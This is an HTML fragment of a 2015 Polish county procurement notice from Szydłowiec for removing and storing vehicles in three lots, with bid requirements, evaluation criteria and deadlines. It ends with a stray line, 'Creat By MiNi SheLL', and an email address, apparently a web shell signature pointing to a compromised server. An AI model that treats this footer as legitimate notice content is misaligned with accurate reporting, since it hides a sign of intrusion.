<p>1) formularz ofertowy, z wykorzystaniem wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia; w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną, 2) W przypadku, gdy wykonawcę w przetargu reprezentuje pełnomocnik oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony odpis takiego pełnomocnictwa, 3) wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego, jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze danego Wykonawcy. Stosowne odpisy z rejestru powinny zostać dołączone do oferty. W celu potwierdzenia, że oferowane usługi spełniają wymagania określone przez zamawiającego wykonawca powinien złożyć oświadczenie zawarte w formularzu oferty stanowiącym załącznik nr1 do specyfikacji istotnych warunków zamówienia. Zamawiający żąda, aby w formularzu oferty Wykonawca wskazał części zamówienia, których wykonanie powierzy podwykonawcom. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas dojazdu - 02</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) osób wymienionych w § 4 umowy (osoby wyznaczone do kierowania oraz
nadzorowania i kontrolowania świadczonych usług)
2) zmiany potencjału technicznego przedstawionego w ofercie przetargowej, pod
warunkiem, że zmiany te nie spowodują obniżenia parametrów potencjału oraz
zaistnieje jedna z poniższych okoliczności:
a) zmiana spowoduje poprawienie parametrów technicznych,
b) zmiana wyniknie z aktualizacji rozwiązań z uwagi na postęp technologiczny
lub zmiany obowiązujących przepisów.	
2. Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie
zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia
faktycznego oraz wyrażenie zgody drugiej strony.
3. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.szydlowiecpowiat.akcessnet.net/index.php?idg=1&id=1&x=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Szydłowcu, Plac M. Konopnickiej 7, 26- 500 Szydłowiec, Wydział Rozwoju i Promocji Powiatu- pokój nr 206 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Szydłowcu, Plac M. Konopnickiej 7, 26- 500 Szydłowiec, Kancelaria Starosty- pokój nr 100 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usuwanie i przechowywanie rowerów, motorowerów, motocykli i innych pojazdów o dopuszczalnej masie całkowitej do 3,5 t., z wyjątkiem pojazdów przewożących materiały niebezpieczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Usunięcie roweru lub motoroweru - 16 sztuk,
-	liczba dób przechowywania - 3 ,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu -3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
2. Usunięcie motocykla - 10 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
3. Usunięcie pojazdu o dopuszczalnej masie całkowitej do 3,5 t - 60 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 14,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usuwanie i przechowywanie pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t., z wyjątkiem pojazdów przewożących materiały niebezpieczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Usunięcie pojazdu o dopuszczalnej masie całkowitej powyżej 3,5 t do 7,5 t -6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
2.	Usunięcie pojazdu o dopuszczalnej masie całkowitej powyżej 7,5 t do 16 t - 6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
3. Usunięcie pojazdu o dopuszczalnej masie powyżej 16 t - 6 sztuk,
-	liczba dób przechowywania - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
-	odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usuwanie i przechowywanie pojazdów przewożących materiały niebezpieczne- 3 sztuki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba dób przechowywania - 3,
- odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia, ale nie podjęciem czynności związanych z załadunkiem pojazdu - 3,
- odstąpienie od wykonania usługi usunięcia pojazdu w przypadku dojazdu do miejsca zdarzenia i podjęcia czynności związanych z załadunkiem pojazdu - 3,
Rzeczywista ilość zleconych usług uwarunkowana będzie od faktycznych potrzeb w okresie realizacji przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com